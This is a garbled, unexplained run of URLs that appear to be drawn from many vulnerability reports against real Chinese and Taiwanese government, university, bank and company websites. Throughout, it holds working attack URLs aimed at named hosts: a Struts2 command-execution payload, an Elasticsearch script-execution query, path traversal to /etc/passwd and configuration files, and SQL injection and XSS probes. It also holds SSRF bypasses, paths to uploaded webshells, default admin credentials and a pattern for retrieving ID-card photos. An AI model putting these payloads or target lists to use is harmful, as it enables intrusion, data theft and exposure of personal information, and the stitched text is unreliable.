http://widget.renren.com/dialog/share?resourceUrl=http://dwz.cn/CvchS http://daxue.renren-inc.com/bbs是discuz http://widget.renren.com/dialog/share?resourceUrl=http://dwz.cn/CvchS进行测试,发现漏洞存在但是没有我们想要的结果。 http://multimedia.tcl.com//WEB-INF/web.xml http://multimedia.tcl.com/WEB-INF/classes/log4j.properties http://multimedia.tcl.com/en//.svn/entries http://221.1.104.11:8011/ExtWebModels/WebFront/ShowOtherInfo.aspx?id= http://221.2.171.59:8300/ExtWebModels/WebFront/ShowOtherInfo.aspx?id= http://demo.inongyou.cn/ExtWebModels/WebFront/ShowOtherInfo.aspx?id= http://rctdlz.cn/ExtWebModels/WebFront/ShowOtherInfo.aspx?id= http://60.2.214.118:8088/ExtWebModels/WebFront/ShowOtherInfo.aspx?id= http://121.17.2.52/ExtWebModels/WebFront/ShowOtherInfo.aspx?id= http://61.186.154.210:8088/ExtWebModels/WebFront/ShowOtherInfo.aspx?id= http://www.ezwtj.gov.cn/readnews.aspx?nid=3822 http://pgzy.zjzs.net:8011/ashx/ajaxHandler.ashx http://pgzy.zjzs.net:8011/xnml/pic/savepic/33/01/05/1998/09/330105199809220011.jpg http://pgzy.zjzs.net:8011/xnml/pic/savepic/{身份证1-2位}/{身份证3-4位}/{身份证5-6位}/{身份证7-10位]/{身份证11-12位}/{完整身份证号}.jpg http://**.**.**/dbAdminsh/index.php_ http://portal.wangge.cc/api/index_v2.php?act=fetchsupinfo&gw_id=gw_yysx https://partner.maxthon.com https://partner.maxthon.com/index.php?keyword=&type_black=&type_white=Y https://partner.maxthon.com/black_list.php http://www.appstar.com.cn/ www.appstar.com.cn http://www.zsszyl.gov.cn/login/login.php http://www.appstar.com.cn http://www.appstar.com.cn/upload/itBook/2015010507709/it201503010048023471/word/J.jsp http://mail.156.cn/auth/reg1.action http://www.fahyyy.gov.cn/upload/ http://rtb.bitsmart.com.cn/ http://down.chinaz.com/soft/33546.htm http://www.morenedu.com/add_book.asp http://www.sibfi.com/add_book.asp http://siee.pzhu.cn/add_book.asp http://www.ldgsyy.com/add_book.asp http://www.sztmc.com/add_book.asp http://www.jskcedu.com/add_book.asp http://jwc.qdbhu.edu.cn/sy/add_book.asp http://61.134.38.38:8082/Svrs/Schedule.shtml http://61.134.38.38:8082/Svrs/Schedule.shtml http://221.181.248.2:8081/授权用户:淮安建设银行 http://112.24.101.142:8081/授权用户:建设银行江苏省分行 http://221.181.161.122:8081/授权用户:建设银行江苏省分行 http://221.131.71.210:8081/授权用户:中国移动通信集团江苏有限公司镇江分公司 http://112.21.184.154:8081/授权用户:常州建设银行 http://223.68.222.20:8081/授权用户:建设银行江苏省分行 http://env.bnu.edu.cn/mainview.php?cid=1&id=130%20and%201=1 http://env.bnu.edu.cn/mainview.php?cid=1&id=130%20and%201=2 http://www.ccgp-jiangsu.gov.cn http://218.94.38.180:7001/ http://www.ccgp-jiangsu.gov.cn:8081/carxygh/carSeach.do?car_manufacturers=122 http://licai.51credit.com//WEB-INF/web.xml http://licai.51credit.com//WEB-INF/classes/jdbc.properties http://zte.appstar.com.cn http://zte.appstar.com.cn/userlogin.action http://qjxy.hznu.edu.cn/oa/login.php http://user.pipi.cn/myMovsFirst.jsp?uid=15176 http://user.pipi.cn/myCommentsFirst.jsp?uid=9854177 http://drops.wooyun.org/tips/57 http://support.tcleu.com/admin/ m.aili.com/index.php?a=on_global_loginbk&c=wap&callback=jsonp1425083838041&chkcode=e&m=member&pwd=e1671797c52e15f763380b45e841ec32&username=%bf http://m.aili.com/index.php?a=on_global_loginbk&c=wap&callback=jsonp1425083838041&chkcode=e&m=member&pwd=e1671797c52e15f763380b45e841ec32&username=%bf%27%0a||%0a12=12%0a%23 http://sppa.xju.edu.cn/shownews.asp?id=179 http://jck.tcl.com/ URL:http://jck.tcl.com/Trade/InfoCompanyNewsView.aspx?id=11 http://www.yichemall.com/ http://www.yichemall.com:80/ http://www.yichemall.com/ www.yichemall.com http://m.gwdang.com/.svn/entries http://dj.jmwjm.gov.cn/news.asp?keyword=1&imageField=88952634 http://www.tornadoweb.org/en/stable/web.html#tornado.web.Application)中可以得知: http://dzhcg.wuxi.gov.cn/homePage.action?action=webSiteIndex http://222.82.238.99:8080/login.html http://www.gxufl.com/jpkc/gxufl/search.asp http://dlx.lenovo.com/dlxsite/logon.aspx http://dlx.lenovo.com.cn/dlx3/DLX.RRS.Web/UI/Application/ResellerBasicInfo.aspx DLX.RRS.Web/ajax/DLX.RRS.Business.Access.AreaAccess,DLX.RRS.Business.ashx?_method=GetCityAreaDs&_session=r http://dlx.lenovo.com.cn http://www.dvripc.cn/ http://www.jiaju.com http://www.jiaju.com/o/trade/coupons/ www.jiaju.com https://github.com/zry656565/foundation/blob/a759eeeded14c29f2cc827588d121790585826ad/alipay/return_url.php http://tyxy.qhnu.edu.cn/news_detail.asp?id=428 www.csir.whu.edu.cn http://219.143.215.163/bjLottery/login.jsp http://219.143.215.163/bjLottery/assgin/viewLotterResult.action http://weixin.91160.com/ http://weixin.91160.com/index.php?c=find&a=index&site=0 http://weixin.91160.com http://219.143.118.86/ http://debug.moxian.com/key.php http://debug.moxian.com:8088/.svn/entries http://s22.jxqy.game.yy.com/phpmyadmin/ http://61.161.141.34/admin/login.jsp http://ip/video.3gp文件: www.cns.net.tw http://61.161.141.51/admin/login.jsp http://www.ztewelink.com http://www.ztewelink.com//FCKeditor/editor/filemanager/browser/default/connectors/test.html http://www.ztewelink.com/uploads/mu.asp http://bc.ifeng.com/c?db=ifeng&bid=16277,15962,3436&cid=2501,59,1&sid=33869&advid=349&camid=3546&show=ignore&url=http://jjhlhlhlkjh.4324554.bjyqttc.com http://www.eftimes.cn/ http://www.dingfeng-cn.com.cn/view_n.asp?id=101 http://www.kelaosi.com/view_n.asp?id=105 http://www.tjlingchuang.com/view_n.asp?id=157 http://www.novatj.com/view_n.asp?id=84 http://www.zytkt.com/view_n.asp?id=290 http://www.tjyidian.com/view_n.asp?id=177 http://www.lzycup.com/view_n.asp?id=87 http://www.ls-zy.com/view_n.asp?id=75 http://www.sunweikeji.com/view_n.asp?id=85 http://www.richu888.com/view_n.asp?id=205 http://www.ysjq.net/view_n.asp?id=78 http://www.lipin688.com/view_n.asp?id=79 http://www.tjzubai.com/view_n.asp?id=461 http://www.tianjinyingdong.com/view_n.asp?id=72 http://www.qifanedu.com/view_n.asp?id=384 http://www.anshunxin.com/view_n.asp?id=76 http://www.tjshdk.com/view_n.asp?id=97 http://www.anshunxin.com/view_n.asp?id=75 http://www.nxrmyy.com/View_N.asp?id=977 http://www.fanucweixiu.com/view_n.asp?id=82 http://www.taihonggroup.com/view_n.asp?id=319 http://www.yehis.com/view_n.asp?id=101 http://www.tjydy.com.cn/view_n.asp?id=80 http://www.junhuadianzi.com/view_n.asp?id=79 http://www.tjsbstud.com/view_n.asp?id=77 http://www.tjsjyh.cn/view_n.asp?id=78 http://www.hkwanshida.com/view_n.asp?id=118 http://www.fanucweixiu.com/view_n.asp?id=95 http://www.beihaoshengwu.com/view_n.asp?id=107 http://www.hzasyd.net/view_n.asp?id=79 http://www.qlyingxiang.com/qlhtml/view_n.asp?id=113 http://www.dafeng-medical.com/view_n.asp?id=75 http://www.lvdanban.net/view_n.asp?id=125 http://www.tjzhineng.net/view_n.asp?id=75 http://www.tjxwhb.com/view_n.asp?id=167 http://www.sanzuobiao.net/view_n.asp?id=24&cid=4 http://www.nxfb.com/View_N.asp?id=4 https://github.com/fujinwen/InfoRegent/blob/master/index.html http://59.33.249.55/ http://www.mobiportal.cn/ http://portal.landray.com.cn/ http://www.mlandray.com/ http://weixincs.heungkong.com/ http://61.144.246.189/ http://email.maduqi.com/ http://bbs.konka.com/ http://wx.rongchain.com/mobile.php?act=module&from_user=22&name=icard&do=manageaddress&weid=5 http://sec.chinabyte.com/157/13173657.shtml https://community.qualys.com/blogs/securitylabs/2014/12/08/poodle-bites-tls http://eip.tcl.com/phones/login.aspx http://locc.vipshop.com/test http://locc.vipshop.com/js/user-index.js http://locc.vipshop.com/user/数字 http://locc.vipshop.com/user/1.json www.skcoo.com)运维管理不当, http://210.21.119.232:804/ http://mail.ccfda.gov.cn/admin/sys/login.do http://www.phpmps.com/demo/data/com/thumb/20150104iaoydj.php www.707070.cn https://sslvpn.sinopec.com/ http://zhbg.hda.gov.cn/spsp/userreg/userReg!toRegPage.do WebPath:/apps/zhpt/resin-3.1.0/webapps/spsp/ http://www.xxxx.com/download/*.asp http://www.xxxx.com/upload/*.asp http://kczx.sus.edu.cn/G2S/AdminSpace/PublicClass/AddCathedraWare.aspx http://cc.sjtu.edu.cn/G2S/AdminSpace/PublicClass/AddCathedraWare.aspx http://cc.sbs.edu.cn/G2S/AdminSpace/PublicClass/AddCathedraWare.aspx http://cc.shnu.edu.cn/G2S/AdminSpace/PublicClass/AddCathedraWare.aspx http://cc.bjmu.edu.cn/G2S/AdminSpace/PublicClass/AddCathedraWare.aspx http://jiaohu.buaa.edu.cn/G2S//AdminSpace/PublicClass/AddCathedraWare.aspx http://cc.njau.edu.cn/G2S/AdminSpace/PublicClass/AddCathedraWare.aspx http://cc.scu.edu.cn/G2S/AdminSpace/PublicClass/AddCathedraWare.aspx http://e-learning.ecust.edu.cn/G2S/AdminSpace/PublicClass/AddCathedraWare.aspx http://course.ujn.edu.cn/G2S/AdminSpace/PublicClass/AddCathedraWare.aspx http://cc.xjtu.edu.cn/G2S/AdminSpace/PublicClass/AddCathedraWare.aspx http://kczx.xhu.edu.cn/G2S/AdminSpace/PublicClass/AddCathedraWare.aspx http://www.course.sdu.edu.cn/G2S//AdminSpace/PublicClass/AddCathedraWare.aspx http://kczx.shupl.edu.cn/G2S/AdminSpace/PublicClass/AddCathedraWare.aspx http://kczx.hebut.edu.cn/G2S/AdminSpace/PublicClass/AddCathedraWare.aspx http://kczx.sus.edu.cn/G2S/AdminSpace/PublicClass/AddCathedraWare.aspx http://kczx.sus.edu.cn/download/86b330d8-9f70-4d59-8720-dd9d9da18b0a.asp http://kczx.xhu.edu.cn/G2S//AdminSpace/PublicClass/AddCathedraWare.aspx http://kczx.xhu.edu.cn/upload/08292dc8-bc57-4d6d-9e36-e3a980d74cf6.asp http://kczx.sus.edu.cn/G2S//AdminSpace/PublicClass/AddCourseWare.aspx http://cc.sjtu.edu.cn/G2S//AdminSpace/PublicClass/AddCourseWare.aspx http://cc.sbs.edu.cn/G2S//AdminSpace/PublicClass/AddCourseWare.aspx http://cc.shnu.edu.cn/G2S//AdminSpace/PublicClass/AddCourseWare.aspx http://cc.bjmu.edu.cn/G2S//AdminSpace/PublicClass/AddCourseWare.aspx http://jiaohu.buaa.edu.cn/G2S//AdminSpace/PublicClass/AddCourseWare.aspx http://cc.njau.edu.cn/G2S//AdminSpace/PublicClass/AddCourseWare.aspx http://cc.scu.edu.cn/G2S//AdminSpace/PublicClass/AddCourseWare.aspx http://e-learning.ecust.edu.cn/G2S//AdminSpace/PublicClass/AddCourseWare.aspx http://course.ujn.edu.cn/G2S//AdminSpace/PublicClass/AddCourseWare.aspx http://cc.xjtu.edu.cn/G2S//AdminSpace/PublicClass/AddCourseWare.aspx http://kczx.xhu.edu.cn/G2S//AdminSpace/PublicClass/AddCourseWare.aspx http://www.course.sdu.edu.cn/G2S//AdminSpace/PublicClass/AddCourseWare.aspx http://kczx.shupl.edu.cn/G2S//AdminSpace/PublicClass/AddCourseWare.aspx http://kczx.hebut.edu.cn/G2S//AdminSpace/PublicClass/AddCourseWare.aspx http://jxzx.bucea.edu.cn/G2S//AdminSpace/PublicClass/AddCourseWare.aspx http://course.hzau.edu.cn/G2S//AdminSpace/PublicClass/AddCourseWare.aspx http://kczx.sus.edu.cn/G2S//AdminSpace/PublicClass/AddCourseWare.aspx http://kczx.sus.edu.cn/download/51b85509-4dc4-4ea1-b5f2-b4d55725fd94.asp http://passport.lagou.com/login/login.html?ts=1425278729631&serviceId=lagou&service=http%253A%252F%252Fwww.lagou.com%252F&action=login&signature=B1CD5CF2DF1B41FF17504FA216925B84 http://m.yiqifei.com/user/blog/Edit.aspx?r= http://www.wooyun.org/bugs/wooyun-2015-099062/trace/dbd9d85ef5bc0a46eabb72709a5591cd http://www.luolai.com/company_news_detail.php?id=156 www.luolai.com/admin/privilege.php http://www.hbtycp.com/Search.aspx?key=11%u90095 http://apistore.baidu.com/astore/toolshttpproxy http://wssp.jiangxi.gov.cn:8008/outportal/licenseManage/newLicenseManage.jsp http://117.40.187.175:8008/outportal/licenseManage/newLicenseManage.jsp http://wssp.jdz.gov.cn/outportal/licenseManage/newLicenseManage.jsp http://xzfw.jinxi.gov.cn/outportal/licenseManage/newLicenseManage.jsp http://wssp.lepingshi.gov.cn/outportal/licenseManage/newLicenseManage.jsp http://xzfw.jxcr.gov.cn/outportal/licenseManage/newLicenseManage.jsp http://120.203.196.20/outportal/licenseManage/newLicenseManage.jsp http://wssp.jiangxi.gov.cn:8008/outportal/licenseManage/newLicenseManage.jsp cn:8008 http://wssp.jiangxi.gov.cn:8008 http://www.strongsoft.net/ ldfxb.com/Public/DataAccess/Water/WaterChartDataProvider.ashx?dateForAjax=656 yj.yywater.gov.cn/Public/DataAccess/Water/WaterChartDataProvider.ashx?dateForAjax=656 shzh.wlfx.gov.cn/Public/DataAccess/Water/WaterChartDataProvider.ashx?dateForAjax=656 shzh.dqwater.gov.cn/Public/DataAccess/Water/WaterChartDataProvider.ashx?dateForAjax=656 country:China user:admin pass:admin user:default pass:user user:888888 pass:admin user:666666 pass:user http://183.252.252.141:81/ http://183.245.118.62:8080/ http://183.250.45.121:8000/ http://183.250.27.60:81/ http://183.252.252.141:81/ http://183.248.200.2:8080/ http://218.10.65.235/highcomoa/homepage.nsf/FormWeb_Main1?openform http://lar.unicomgd.com/ http://b.unicomgd.com/ http://sla.unicomgd.com/ http://a.unicomgd.com/ http://d.unicomgd.com/ http://i.unicomgd.com/ http://svn.hoolai.com/hoolai-video-frontend/applay http://svn.hoolai.com/hoolai-video-frontend http://58.221.14.206:8081/wsdg_nantong/index.php/profile/remind http://job.hunnu.edu.cn/index_department.php?gradyear=2015&self_action=1&action_code=0&dep_id=9&name_find= http://box.lenovo.com/index.html https://box.lenovo.com/v1/team/list_by_id/34321*?with_member=false&page_num=0&_=1425219541549&account_id=143661&uid=200157 http://gte.cnoocgas.com:8080/portal/login.jsp http://gte.cnoocgas.com:8080/portal/finduserlist.jsp?usercodelevel= http://demo.magicmail.com.cn:9988/演示邮箱用户名: http://10.1.157.64/maccms8_mfb/inc/ajax.php http://127.0.0.1/asd.html,修复时容易出现的获取host时以/分割来确定host。 http://abc@127.0.0.1/这样绕过。例如: www.10.0.0.1.xip.io http://tp.chinaso.com/web?url=http://www.10.10.0.179.xip.io&fr=client http://widget.renren.com/dialog/share?resourceUrl=http://www.10.10.16.224.xip.io http://share.renren.com/share/buttonshare.do?link=http://www.10.10.16.224.xip.io http://note.youdao.com/memory/?url=http://www.10.120.182.20aaa.xip.io http://qing.blog.sina.com.cn/blog/controllers/share.php?url=www.127.0.0.1.xip.io/asd.html http://www.strongsoft.net/ ldfxb.com/MapInfoShow/InfoDetail.aspx?keycol=RSCD&tabnm=StrongWater.dbo.RS_Info_B&ADCD=rs054 yj.yywater.gov.cn/MapInfoShow/InfoDetail.aspx?keycol=RSCD&tabnm=StrongWater.dbo.RS_Info_B&ADCD=rs054 shzh.wlfx.gov.cn/MapInfoShow/InfoDetail.aspx?keycol=RSCD&tabnm=StrongWater.dbo.RS_Info_B&ADCD=rs054 shzh.dqwater.gov.cn/MapInfoShow/InfoDetail.aspx?keycol=RSCD&tabnm=StrongWater.dbo.RS_Info_B&ADCD=rs054 http://gte.cnoocgas.com:8080/invoker/JMXInvokerServlet index.php/stat/clickStat http://scc.whut.edu.cn/ http://www.strongsoft.net/ ldfxb.com/MapInfoShow/InfoMain.aspx?menuUrl=InfoMenuReservoir.aspx&ADCD=rs046 yj.yywater.gov.cn/MapInfoShow/InfoMain.aspx?menuUrl=InfoMenuReservoir.aspx&ADCD=rs046 shzh.wlfx.gov.cn/MapInfoShow/InfoMain.aspx?menuUrl=InfoMenuReservoir.aspx&ADCD=rs046 shzh.dqwater.gov.cn/MapInfoShow/InfoMain.aspx?menuUrl=InfoMenuReservoir.aspx&ADCD=rs046 http://loudong.360.cn/vul/info/qid/QTVA-2015-181718 http://www.bzagri.gov.cn/More.asp?BigID=49&SmallID=66 http://www.bztc.gov.cn/More.asp?BigID=1&SmallID=2 http://www.pcny.gov.cn/More.asp?BigID=49&SmallID=66 http://pcsf.bzdc.cn/More.asp?BigID=1&SmallID=2 http://www.tjxwsj.cn/More.asp?BigID=49&SmallID=66 http://www.pcny.gov.cn/More.asp?BigID=1&SmallID=2 http://www.tjxyjj.cn/More.asp?BigID=49&SmallID=66 http://www.bzsglj.cn/More.asp?BigID=1&SmallID=2 http://www.scpcgt.gov.cn/More.asp?BigID=49&SmallID=66 http://www.bzqtzb.com/More.asp?BigID=1&SmallID=2 http://mis.trip8080.com有s2-016漏洞 http://mis.trip8080.com/station/rand.action?redirect:${%23a%3d%28new%20java.lang.ProcessBuilder%28new%20java.lang.String[]{%27id%27}%29%29.start%28%29,%23b%3d%23a.getInputStream http://www.trip8080.com/5ac73da4824100ac52100d7577aa8fae.html encap:Ethernet E4:1F:13:68:DC:60 addr:172.19.0.31 Bcast:172.19.0.255 Mask:255.255.255.0 e61f:13ff:fe68:dc60/64 Scope:Link MTU:1500 packets:4282524440 errors:36366664 dropped:36376895 frame:36366664 packets:5406440041 txqueuelen:1000 http://shuntian.hezuo.trip8080.com/invoker/EJBInvokerServlet http://www.strongsoft.net/ ldfxb.com/Public/DataAccess/Rain/RainChartDataProvider.ashx?dateForAjax=200 yj.yywater.gov.cn/Public/DataAccess/Rain/RainChartDataProvider.ashx?dateForAjax=200 shzh.wlfx.gov.cn/Public/DataAccess/Rain/RainChartDataProvider.ashx?dateForAjax=200 shzh.dqwater.gov.cn/Public/DataAccess/Rain/RainChartDataProvider.ashx?dateForAjax=200 http://lwzb.gdstats.gov.cn/bjstat_web/webtb/reportlistentry.do?yhid=770986785%27# http://www.xj96566.com/IOC/thread/business!getBossUserData.action?cardnum=4111681000 http://cii.cup.edu.cn/test.txt http://cii.cup.edu.cn/shl.asp;jpg http://www.gzyydz.com/classnews.asp?News_Class=%3Cscript%3Ealert%28%22xss%22%29%3C/script%3E http://jmoa.183.gd.cn/zhenghe/AnnounceMore.aspx?type=1 http://www.xj96566.com/upload/template/dean_xiaomi130903/point/ http://www.xj96566.com/upload/images/upload/ http://www.xj96566.com/upload/point_tmp_input.php http://www.xj96566.com/upload/images/upload/creative/a.php http://www.xj96566.com/upload/images/upload/creative/b.php http://www.xj96566.com/upload/plugin.php?id=levaward%3Aaward&doingid=10 http://220.191.208.55/p01/login!doLogin.action http://220.180.89.90:8081/userlogin.aspx http://www.zixilib.com:8008/userlogin.aspx http://dydl.sddylib.com/userlogin.aspx http://ggg.360elib.com/userlogin.aspx http://221.1.218.166:81/userlogin.aspx http://co.dichuang.cc:85/userlogin.aspx http://218.23.126.222:999/userlogin.aspx http://60.170.103.21:81/userlogin.aspx http://zslib.org:8000/userlogin.aspx http://211.141.185.166:82/userlogin.aspx http://www.tsqtsg.cn:88/userlogin.aspx http://book.gyxtsg.org/userlogin.aspx http://120.194.7.10:8087/userlogin.aspx http://www.zixilib.com:8008/userlogin.aspx http://co.dichuang.cc:85/userlogin.aspx http://220.180.89.90:8081/userlogin.aspx http://www.tlzxx.net/tushu/userlogin.aspx http://www.tsqtsg.cn:88/userlogin.aspx http://120.194.7.10:8087/userlogin.aspx http://221.1.218.166:81/userlogin.aspx为例: http://221.1.218.166:81 http://www.zhanchengkeji.com/admin/ http://acm.hdu.edu.cn/compare.php?action=compare http://www.xipute.com/About.asp?id=7 http://www.dyhfdz.com/About.asp?id=7 http://www.js-huarong.com/About.asp?id=1 http://jsshenya.com/About.asp?id=1 http://www.jsdanxiang.com/About.asp?id=2 http://www.js-enor.com/About.asp?id=1 http://dyxinchao.com/About.asp?id=1 http://www.jschangyue.com/About.asp?id=1 http://221.179.35.18/g3photo.war http://221.179.35.18/g3photo.tar.gz http://u.languang.com/ http://price.zol.com.cn/article/price_down.shtml https://202.108.103.187/ http://demo.lebi.cn/onlinepay/tenpayJSDZ/payNotifyUrl.aspx com:11324 http://www.zzcredit.gov.cn/ http://www.zzcredit.gov.cn/ShowNews?GROUPPATH=tzgg&GUID=B37ADC34-A9A0-4926-A03F-5F39C5AAC433 http://weixin.cbtn.tv:8080/yicai/ http://221.232.143.98/web/device/login?lang=1可以看出是采用h3c的解决方案 http://221.232.143.98:1001/Clt_trq/loginSum.action http://lincoln.youku.com/pma/ https://admin.xianji.game.yy.com问题站 http://bbs.uc.cn/kg/这里自定义图片,可以任意上传。 http://218.106.133.136/ http://218.106.133.136/companycase/SelectPer.aspx http://www.hunanzx.gov.cn:8080/sqmy/user!loguserinfo.action http://fanxian.egou.com/myegoufindaddress.do?id=3550500 http://fanxian.egou.com/myegoufindaddress.do?id=3550222 http://fanxian.egou.com/myegoufindaddress.do?id=3550111 www.hebei-huafeng.com http://demo.lebi.cn/onlinepay/95epay/PayNotify.aspx http://demo.lebi.cn/onlinepay/95epay/PayResult.aspx https://hr.minshengec.cn/hrss/login.jsp cn:443 https://hr.minshengec.cn http://**.**.**/_ http://**.**.**/_ http://**.**.**/_ http://**.**.**/ http://**.**.**/other/SppointmentExcelLogon.aspx http://vico1.vw.com.cn/other/eos_excel.aspx http://**.**.**/newcms/orm/index.aspx https://gems.haier.net/gems/security/loginInit.action?request_locale=en_US http://119.255.46.18:8081/ http://121.9.230.130:8086/ http://183.234.48.155:8086/ www.chinabank.com.cn/download/download.jsp?name=../../../../../../../../../../etc/passwd http://jas.hkbu.edu.hk/page.php?c=1&id=103 http://zone.wooyun.org/content/17605 http://219.216.227.196:8089/LibrarySite/index.action http://www.sheratongrandetaipei.com.tw/restaurant_content.php?id=5 http://www.ipe.org.cn/gca/Page2.aspx?shangshicode=000155 www.ckide.com/PHPWind/upload/mode.php?m=o http://www.sheratongrandetaipei.com.tw/accommodation_content.php?id=12 http://www.sheratongrandetaipei.com.tw/restaurant_content.php?id=3 http://www.sheratongrandetaipei.com.tw/event_content.php?id=83 http://www.sheratongrandetaipei.com.tw/news_content.php?id=27 http://www.sheratongrandetaipei.com.tw/occasions_content.php?id=5 http://www.wysxzfw.gov.cn/portal/new/content.jsp?id=20120106-935E1E4D586DBA408B54-11 http://cc.yundasys.com:8087/callcenter_new/popedom/userExit.action http://211.151.121.183:9200,根据厂商交流发现,ip是世纪互联的(见 http://211.151.121.183:9200/_plugin/head/ http://www.byqzxyy.com/info.php?id=2 http://www.byqzxyy.com/info.php?id=1 http://www.ykjwjdz.gov.cn/jzgl/info.php?id=2 http://www.limin-group.com/info.php?id=1 http://www.ykbwg.com/info.php?id=1 http://www.liaobin.com/info.php?id=6 http://www.kzsny.com/info.php?id=3 http://www.ndkpiano.com/info.php?id=2 http://www.ykshydl.com/info.php?id=1 http://www.sycb.cc/info.php?id=3 http://www.lnshbz.com/info.php?id=6 http://www.ykrunda.com/info.php?id=2 http://www.jzbyk.com/info.php?id=1 http://www.yktdba.net/info.php?id=1 http://www.ykdrsb.com/info.php?id=2 http://www.ykhzcc.com/info.php?id=1 http://www.ykhaitong.com/info.php?id=11 http://www.ykgljx.com/info.php?id=1 http://www.ykeast.com/info.php?id=1 http://www.yksfdc.com/info.php?id=4 http://oa.shufesp.com:8080/vmain/login.jsp http://oa.shufesp.com:8080/ServiceAction/com.velcro.base.DataAction?sql= http://oa.shufesp.com:8080/ServiceAction/com.velcro.base.DataAction?sql=select/**/@@VERSION url:http://www.ase.cn,后台登陆页面存在sql注入漏洞。 http://think.lenovo.com.cn/ http://think.lenovo.com.cn/stations/Api/QueryMap.ashx?area=0451&type=ThinkPad http://serviceshop.lenovo.com.cn/ http://183.224.69.18/Details.aspx http://www.jljl.lss.gov.cn/news_listall.asp?kind= http://27.223.70.11/ http://27.223.70.11/ http://member.aili.com http://mcbbs.kuaikuai.cn/uc_server http://**.**.**/login.jsp http://skc.xtu.edu.cn/myphp/skc/php/downfile.php?downfile=../../../../e/config/config.php http://skc.xtu.edu.cn/myphp/skc/php/downfile.php?downfile=../../../../myphp/skc/skc_admin/config_base.php http://218.57.170.90:8080和http://218.57.170.90:6666/ http://itams.com.cn/ http://www.ptsn.net.cn/standard/std_query/show.php?source=yd&id=4425 http://tyb.njupt.edu.cn/ http://student.thestandard.com.hk/junior/ls_content_vpdf.asp?t=1&id=226 http://www.kaiyuan.eu/ http://www.kaiyuan.eu/ http://www.kaiyuan.eu/ http://lenovobbs.lcf5.lenovo.com.cn/test.php www.wowsai.com/index.php?act=ajax&app=cart&fun=get_activity_goods&id=1 http://ctx.wanda.cn/wanda/feedback http://ctx.wanda.cn/wanda/upload/test1.jspx http://gs.bnet.cn/ http://202.100.80.9/u-portal/ http://202.100.80.9/u-portal/ajax/reflexes!reflex.do http://debug.baozoumanhua.com:9200/_search?source=%7B%0A%22size%22%3A1%2C%0A%22script_fields%22%3A%20%7B%0A%20%20%20%20%22lupin%22%3A%20%7B%0A%20%20%20%20%20%20%20%20%22script%22%3A%20%22java.lang.Math.class.forName%28%5C%22java.lang.Runtime%5C%22%29%22%2C%22lang%22%3A%22groovy%22%0A%20%20%20%20%7D%0A%20%7D%0A%7D http://114.112.174.170/serviceAct/saveUseLong.action http://www.kuaidi100.com/query?id=1&postid=300003849895&temp=0.8066521694418043&type=quanfengkuaidi&valicode= https://116.228.218.6/AuditSec/system/findPassword.action http://www.nxdns.net/Case/list_1.html http://www.nxdbn.cn/UploadFaceOK.asp http://www.nxeca.org/UploadFaceOK.asp http://www.nxbaoan.cn/UploadFaceOK.asp http://www.zgxzl.cn/UploadFaceOK.asp http://www.nxhdzy.cn/UploadFaceOK.asp http://byshfw.com/UploadFaceOK.asp http://xn--xhqu8ssqguo6c.com/UploadFaceOK.asp http://www.ynsmb.gov.cn/UploadFaceOK.asp http://xn--fiq06xs2bid.com/UploadFaceOK.asp http://ybgq.net/UploadFaceOK.asp http://www.nxhljz.cn/UploadFaceOK.asp http://www.west-china.net/hygf//UploadFaceOK.asp http://www.fzgc.lawtv.com.cn/Skins/Vedio.aspx?n_id=640&n_lx=10 http://www.sxlfajj.gov.cn/tNews_getAllChildCSZL.action http://www.chiscdc.com/ http://www.shhgzf.com:8280/dwcx/grdetail.asp?bhkidx=1 http://221.230.140.60:8080//dwcx/grdetail.asp?bhkidx=1 http://218.93.201.187:8888/dwcx/grdetail.asp?bhkidx=1 http://221.230.8.231:8081//dwcx/grdetail.asp?bhkidx=1 http://222.184.250.2:8001//dwcx/grdetail.asp?bhkidx=1 http://www.shhgzf.com:8280/dwcx/ http://www.shhgzf.com:8280/dwcx/grdetail.asp?bhkidx=1为例:上海市化工职业病防治为例 http://www.shhgzf.com:8280/dwcx/grdetail.asp?bhkidx=10076 http://www.shhgzf.com:8280/dwcx/grdetail.asp?bhkidx=10077 http://www.shhgzf.com:8280/dwcx/grdetail.asp?bhkidx=10078 http://www.shhgzf.com:8280/dwcx/grdetail.asp?bhkidx=10079 http://www.shhgzf.com:8280/dwcx/grdetail.asp?bhkidx=10080 http://**.**.**/Manager.html http://youxuan.homeinns.com/ http://120.197.89.193/ http://120.197.89.193/WEB-INF/web.xml http://120.197.89.193/WEB-INF/classes/applicationContext.xml http://ma.taobao.com/rl/ebc9d0e7d1af2fd18e7aee1ed1f8ebbd http://login.m.taobao.com/qrcodeLoginAuthor.do?qr_t=s http://ma.taobao.com/rl/ebc9d0e7d1af2fd18e7aee1ed1f8ebbd https://login.taobao.com/member/loginByIm.do?uid=cntaobaousername&token=0104de9b4363476712b9597780a70a00&time=1425148510364&asker=qrcodelogin&ask_version=1.0.0&defaulturl=http%3A%2F%2Fwww.taobao.com%2F&webpas=1b04fa6f6901df787ce9da8848d1a23d2121730000 http://api.weibo.com/t_short_url?outUrl=http://www.taobao.com http://www.taobao.com/webww/redirect.htm?ssshttp://www.baidu.com https://ebooking.ctrip.com/hotel-supplier-ebookinglogin/EbookingLogin.aspx http://m.ebooking.ctrip.com http://eas.baidu.com/_cat/indices http://localhost:9200/_search http://202.114.181.3:8080/opac/search.php http://202.114.181.3:8080/opac/item.php?marc_no=0000807180#review https://mobile.1qianbao.com:443/mtp-web/p1/op_query_userinfo.json http://www2.ahu.edu.cn/bwc/lawdetail.php?NID=7 http://www2.ahu.edu.cn/bwc/admin/login.php http://xsc.ahu.edu.cn/FormNews.aspx?sy_channel=6 http://wyzx.ahu.edu.cn/list/list.jsp?xxlx=4都存在注入,未深入 http://bbs.thinkworldshop.com.cn/ http://m.yiqifei.com/i/articlelist/365654/0.html http://slj.tonghua.gov.cn/tzgg/class/index.php?key=38 http://bbs.hongzhoukan.com/admin.php http://www.gljyzx.com/tzgg/class/?key=38 http://dev.3g.cn/ site:scal.com.cn filetype:txt http://www.scal.com.cn/Scal.WebMaster/FileUpLoad/ModifyOrderLog/2009-10修改订单记录日志.txt http://202.106.162.194:8080/stdmis/user/logout http://114.215.130.150/Manage_index.php http://www.hnzx.gov.cn/show_a2.aspx?id=100 http://www.chiscdc.com/ http://www.shhgzf.com:8280/index.asp http://221.230.140.60:8080/index.asp http://218.93.201.187:8888/index.asp http://221.230.8.231:8081/ http://222.184.250.2:8001/ http://58.211.131.154:84/ http://58.221.214.82:82/ http://58.214.247.138:8088/indextjgr.asp http://yianjkong.vicp.cc:8081/index.asp http://www.szcdc.cn/wstjnew/index.asp http://www.shhgzf.com:8280 http://www.chiscdc.com/ 